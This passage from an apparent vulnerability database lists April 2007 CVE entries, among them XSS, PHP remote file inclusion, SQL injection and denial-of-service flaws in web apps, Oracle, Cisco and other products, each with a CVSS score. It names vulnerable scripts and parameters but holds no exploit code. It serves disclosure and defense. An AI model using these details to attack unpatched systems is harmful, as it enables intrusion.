Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01.

6.8
2007-04-18 CVE-2007-2102 MY Little Homepage Cross-Site Scripting vulnerability in My Little Weblog

Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vector than CVE-2006-6087.

6.8
2007-04-18 CVE-2007-2099 Openconcept Cross-Site Scripting vulnerability in Openconcept Back-End CMS 0.4.7

Cross-site scripting (XSS) vulnerability in htdocs/php.php in OpenConcept Back-End CMS 0.4.7 allows remote attackers to inject arbitrary web script or HTML via the page[] parameter.

6.8
2007-04-18 CVE-2007-2098 Wabbit Cross-Site Scripting vulnerability in Wabbit PHP Gallery 0.9

Multiple cross-site scripting (XSS) vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) pic and (2) gal parameters.

6.8
2007-04-18 CVE-2007-2090 Tumusika Evolution Cross-Site Scripting vulnerability in Tumusika Evolution Tumusika Evolution 1.6

Cross-site scripting (XSS) vulnerability in index.php in TuMusika Evolution 1.6 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.

6.8
2007-04-18 CVE-2007-2089 JX Development Remote File Include vulnerability in Mambo/Joomla New Article Component Absolute_Path

Multiple PHP remote file inclusion vulnerabilities in the Jx Development Article 1.1 and earlier component for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to com_articles.php in (1) components/ or (2) classes/html/.

6.8
2007-04-18 CVE-2007-2087 Cnstats Remote Security vulnerability in Cnstats 2.12

Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/.

6.8
2007-04-18 CVE-2007-2086 Cnstats Remote File Include vulnerability in Cnstats 2.9

Multiple PHP remote file inclusion vulnerabilities in CNStats 2.9 allow remote attackers to execute arbitrary PHP code via a URL in the bj parameter to (1) who_r.php or (2) who_s.php in reports/.

6.8
2007-04-18 CVE-2007-2085 Oe2Edit Cross-Site Scripting vulnerability in OE2edit OE2edit.CGI

Cross-site scripting (XSS) vulnerability in oe2edit.cgi in oe2edit CMS allows remote attackers to inject arbitrary web script or HTML via the q parameter.

6.8
2007-04-18 CVE-2007-2084 Mobilepublisherphp Code Injection vulnerability in Mobilepublisherphp 1.1.2

** DISPUTED ** PHP remote file inclusion vulnerability in MobilePublisherphp 1.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the auth_method parameter to (1) index.php, (2) list.php, (3) postreview.php, (4) reindex.php, (5) sections.php, (6) templates.php, (7) userinfo.php, (8) users.php, and (9) view.php in admin/.

6.8
2007-04-18 CVE-2006-7194 Republique Francaise Remote Security vulnerability in Republique Francaise Agora 1.4Rc1

PHP remote file inclusion vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php in Agora 1.4 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PATH_COMPOSANT] parameter.

6.8
2007-04-18 CVE-2007-2078 Maian Unspecified vulnerability in Maian Weblog 3.1

** DISPUTED ** PHP remote file inclusion vulnerability in index.php in Maian Weblog 3.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

6.8
2007-04-18 CVE-2007-2076 Maian Remote Security vulnerability in Maian Gallery 1.0

PHP remote file inclusion vulnerability in index.php in Maian Gallery 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

6.8
2007-04-18 CVE-2007-2068 Storefront FOR Gallery Remote File Include vulnerability in StoreFront for Gallery Gallery_BaseDir

Multiple PHP remote file inclusion vulnerabilities in the StoreFront mods for Gallery allow remote attackers to execute arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter to (1) mods/business_functions.php or (2) mods/ui_functions.php.

6.8
2007-04-18 CVE-2007-2060 Wizz Computers Unspecified vulnerability in Wizz Computers Wizz RSS Reader

Cross-zone scripting vulnerability in the Wizz RSS Reader before 2.1.9 extension to Mozilla Firefox allows remote attackers to execute arbitrary Javascript in the browser chrome via the RSS feed DOM.

6.8
2007-04-18 CVE-2007-2058 Picozip Directory Traversal vulnerability in Picozip 4.02

Directory traversal vulnerability in Acubix PicoZip 4.02 allows user-assisted remote attackers to overwrite arbitrary files via a ..

6.8
2007-04-16 CVE-2007-2049 Mambo Remote File Include vulnerability in Mambo Calendar 1.5.5

Multiple PHP remote file inclusion vulnerabilities in the Calendar Module (com_calendar) 1.5.5 for Mambo allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) com_calendar.php or (2) mod_calendar.php.

6.8
2007-04-16 CVE-2007-2042 Avant Garde Solutions Remote Security vulnerability in Avant-Garde Solutions Mosmedia 1.0.6

Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite 1.0.6 and earlier module for Mambo allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) support.html.php or (2) info.html.php.

6.8
2007-04-19 CVE-2007-2148 Stephen Craton Remote Security vulnerability in Chatness

Direct static code injection vulnerability in admin/save.php in Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier allows remote authenticated administrators to inject PHP code into .html files via the html parameter, as demonstrated by head.html and foot.html, which are included and executed upon a direct request for index.php.

6.5
2007-04-18 CVE-2007-2111 Oracle SQL Injection vulnerability in Oracle Database Server 10.1.0.5/9.0.1.5/9.2.0.7

SQL injection vulnerability in the SYS.DBMS_AQADM_SYS package in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.5 allows remote authenticated users to inject arbitrary SQL commands via unknown vectors, aka DB04.

6.5
2007-04-18 CVE-2007-2082 Myblog Remote Security vulnerability in MyBlog

Direct static code injection vulnerability in admin/settings.php in MyBlog 0.9.8 and earlier allows remote authenticated admin users to inject arbitrary PHP code via the content parameter, which can be executed by accessing index.php.

6.5
2007-04-16 CVE-2007-2033 Cisco Multiple vulnerability in Cisco Wireless Control System

Unspecified vulnerability in Cisco Wireless Control System (WCS) before 4.0.81.0 allows remote authenticated users to read any configuration page by changing the group membership of user accounts, aka Bug ID CSCse78596.

6.5
2007-04-16 CVE-2007-2040 Cisco Remote vulnerability in Cisco Wireless Lan Controller

Cisco Aironet 1000 Series and 1500 Series Lightweight Access Points before 3.2.185.0, and 4.0.x before 4.0.206.0, have a hard-coded password, which allows attackers with physical access to perform arbitrary actions on the device, aka Bug ID CSCsg15192.

6.2
2007-04-16 CVE-2007-2039 Cisco Resource Management Errors vulnerability in Cisco Wireless LAN Controller Software

The Network Processing Unit (NPU) in the Cisco Wireless LAN Controller (WLC) before 3.2.171.5, 4.0.x before 4.0.206.0, and 4.1.x allows remote attackers on a local wireless network to cause a denial of service (loss of packet forwarding) via (1) crafted SNAP packets, (2) malformed 802.11 traffic, or (3) packets with certain header length values, aka Bug IDs CSCsg15901 and CSCsh10841.

6.1
2007-04-16 CVE-2007-2038 Cisco Remote vulnerability in Cisco Wireless Lan Controller

The Network Processing Unit (NPU) in the Cisco Wireless LAN Controller (WLC) before 3.2.193.5, 4.0.x before 4.0.206.0, and 4.1.x allows remote attackers on a local wireless network to cause a denial of service (loss of packet forwarding) via (1) crafted SNAP packets, (2) malformed 802.11 traffic, or (3) packets with certain header length values, aka Bug ID CSCsg36361.

6.1
2007-04-18 CVE-2007-2112 Oracle Multiple vulnerability in Oracle Database Server 10.1.0.5/10.2.0.3

Unspecified vulnerability in the Authentication component for Oracle Database 10.1.0.5 and 10.2.0.3 has unknown impact and attack vectors, aka DB05.

6.0
2007-04-18 CVE-2007-2109 Oracle Multiple vulnerability in Oracle Database Server 10.2.0.3

Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 have unknown impact and remote authenticated attack vectors related to (1) Rules Manager and Expression Filter components (DB02) and (2) Oracle Streams (DB06).

6.0
2007-04-22 CVE-2007-2165 Proftpd Project Authentication Module Security Bypass vulnerability in ProFTPD AUTH

The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.

5.1
2007-04-22 CVE-2007-2164 KDE Denial-Of-Service vulnerability in KDE Konqueror 3.5.5

Konqueror 3.5.5 release 45.4 allows remote attackers to cause a denial of service (browser crash or abort) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

5.0
2007-04-22 CVE-2007-2163 Apple Denial-Of-Service vulnerability in Safari

Apple Safari allows remote attackers to cause a denial of service (browser crash) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

5.0
2007-04-19 CVE-2007-2151 Mcafee Denial of Service vulnerability in McAfee E-Business Administration Server Authentication Packet

The administration server in McAfee e-Business Server before 8.1.1 and 8.5.x before 8.5.2 allows remote attackers to cause a denial of service (service crash) via a large length value in a malformed authentication packet, which triggers a heap over-read.

5.0
2007-04-18 CVE-2007-2066 Usebb Information Disclosure vulnerability in UseBB

UseBB before 1.0.6 allows remote attackers to obtain sensitive information via a request with unspecified GET or POST parameters to an unspecified script, which reveals the path in an error message.

5.0
2007-04-18 CVE-2007-1869 Lighttpd Remote Denial of Service vulnerability in Lighttpd 1.4.12/1.4.13

lighttpd 1.4.12 and 1.4.13 allows remote attackers to cause a denial of service (cpu and resource consumption) by disconnecting while lighttpd is parsing CRLF sequences, which triggers an infinite loop and file descriptor consumption.

5.0
2007-04-16 CVE-2007-2052 Python Software Foundation Numeric Errors vulnerability in Python Software Foundation Python 2.4/2.5

Off-by-one error in the PyLocale_strxfrm function in Modules/_localemodule.c for Python 2.4 and 2.5 causes an incorrect buffer size to be used for the strxfrm function, which allows context-dependent attackers to read portions of memory via unknown manipulations that trigger a buffer over-read due to missing null termination.

5.0
2007-04-16 CVE-2007-2051 Bftpd Remote Security vulnerability in Bftpd 1.6/1.7

Buffer overflow in the parsecmd function in bftpd before 1.8 has unknown impact and attack vectors related to the confstr variable.

5.0
2007-04-16 CVE-2007-2050 Ricargbook Local File Include vulnerability in Ricargbook 1.2.1

Multiple directory traversal vulnerabilities in header.php in RicarGBooK 1.2.1 allow remote attackers to include and execute arbitrary local files via a ..

5.0
2007-04-16 CVE-2007-2048 Webmethods Directory Traversal vulnerability in webMethods Glue Console

Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system files via a ..

5.0
2007-04-16 CVE-2007-2045 SUN Remote Denial of Service vulnerability in SUN Sunos 5.8/5.9

Unspecified vulnerability in the IP implementation in Sun Solaris 8 and 9 allows remote attackers to cause a denial of service (CPU consumption) via crafted IP packets, probably related to fragmented packets with duplicate or missing fragments.

5.0
2007-04-16 CVE-2007-2030 Redhat Unspecified vulnerability in Redhat Enterprise Linux and Fedora Core

lharc.c in lha does not securely create temporary files, which might allow local users to read or write files by creating a file before LHA is invoked.

4.9
2007-04-22 CVE-2007-2172 Linux
Debian
Canonical
Improper Input Validation vulnerability in multiple products

A typo in Linux kernel 2.6 before 2.6.21-rc6 and 2.4 before 2.4.35 causes RTA_MAX to be used as an array size instead of RTN_MAX, which leads to an "out of bound access" by the (1) dn_fib_props (dn_fib.c, DECNet) and (2) fib_props (fib_semantics.c, IPv4) functions.

4.7
2007-04-19 CVE-2007-1009 Macrovision Authentication Bypass vulnerability in Macrovision Installanywhere 8

Macrovision InstallAnywhere Enterprise before 8.0.1 uses the InstallScript.iap_xml configuration file without integrity protection to verify authorization for installing an application, which allows local users to perform unauthorized installations by removing the (1) password or (2) serial number verification sections from this file.

4.6
2007-04-18 CVE-2007-2074 Scramdisk 4 Linux Local Privilege Escalation vulnerability in ScramDisk 4 Linux

Certain programs in containers in ScramDisk 4 Linux before 1.0-1 execute with SUID permissions, which allows local users to gain privileges via mounted containers.

4.6
2007-04-18 CVE-2007-2110 Oracle
Microsoft
Multiple vulnerability in Oracle Database Server 10.1.0.4/9.0.1.5/9.2.0.7

Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03.

4.4
2007-04-18 CVE-2007-2063 SSH Permissions, Privileges, and Access Controls vulnerability in SSH Tectia Server 5.0/5.1.0/5.2.0

SSH Tectia Server for IBM z/OS before 5.4.0 uses insecure world-writable permissions for (1) the server pid file, which allows local users to cause arbitrary processes to be stopped, or (2) when _BPX_BATCH_UMASK is missing from the environment, creates HFS files with insecure permissions, which allows local users to read or modify these files and have other unknown impact.

4.4
2007-04-22 CVE-2007-2161 Microsoft Unspecified vulnerability in Microsoft Internet Explorer 7.0

Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (browser hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

4.3
2007-04-22 CVE-2007-2159 Drupal Cross-Site Scripting vulnerability in Drupal Database Administration Module 4.6/4.7

Multiple cross-site scripting (XSS) vulnerabilities in the Database Administration (dba) module 4.6.x-*, and before 4.7.x-1.2 in the 4.7.x-1.* series, for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors relating to (1) direct display of data from the database and (2) other portions of the user interface.

4.3
2007-04-18 CVE-2007-2071 Open Gorotto HTML-injection vulnerability in Open-Gorotto 2.0A

Multiple cross-site scripting (XSS) vulnerabilities in Open-gorotto 2.0a 2006/02/08 edition, 2006/03/19 edition, and 2006/04/07 edition before 20070416 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) pub/modules/d/_top.html; (2) /pub/modules/a/_access.html; (3) _circletop.html or (4) _cir66.html in pub/modules/ci/; or (5) _fri66.html, (6) _inv66.html, (7) _top.html, (8) _friends.html, or (9) _fri33.html in pub/modules/f/.

4.3
2007-04-18 CVE-2007-2061 Afterlogic Cross-Site Scripting vulnerability in Afterlogic Mailbee Webmail 3.4

Cross-site scripting (XSS) vulnerability in check_login.asp in AfterLogic MailBee WebMail Pro 3.4 allows remote attackers to inject arbitrary web script or HTML via the username parameter.

4.3
2007-04-16 CVE-2007-2041 Cisco Remote vulnerability in Cisco products

Cisco Wireless LAN Controller (WLC) before 4.0.206.0 saves the WLAN ACL configuration with an invalid checksum, which prevents WLAN ACLs from being loaded at boot time, and might allow remote attackers to bypass intended access restrictions, aka Bug ID CSCse58195.

4.0

3 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-16 CVE-2007-2037 Cisco Resource Management Errors vulnerability in Cisco Wireless LAN Controller Software 3.2/4.0/4.0.108

Cisco Wireless LAN Controller (WLC) before 3.2.116.21, and 4.0.x before 4.0.155.0, allows remote attackers on a local network to cause a denial of service (device crash) via malformed Ethernet traffic.

2.9
2007-04-16 CVE-2007-1558 Apop Protocol Unspecified vulnerability in Apop Protocol Apop Protocol

The APOP protocol allows remote attackers to guess the first 3 characters of a password via man-in-the-middle (MITM) attacks that use crafted message IDs and MD5 collisions.

2.6
2007-04-18 CVE-2007-1856 Gentoo
Paul Vixie
Local Denial of Service vulnerability in Vixie Cron ST_Nlink Check

Vixie Cron before 4.1-r10 on Gentoo Linux is installed with insecure permissions, which allows local users to cause a denial of service (cron failure) by creating hard links, which results in a failed st_nlink check in database.c.

2.1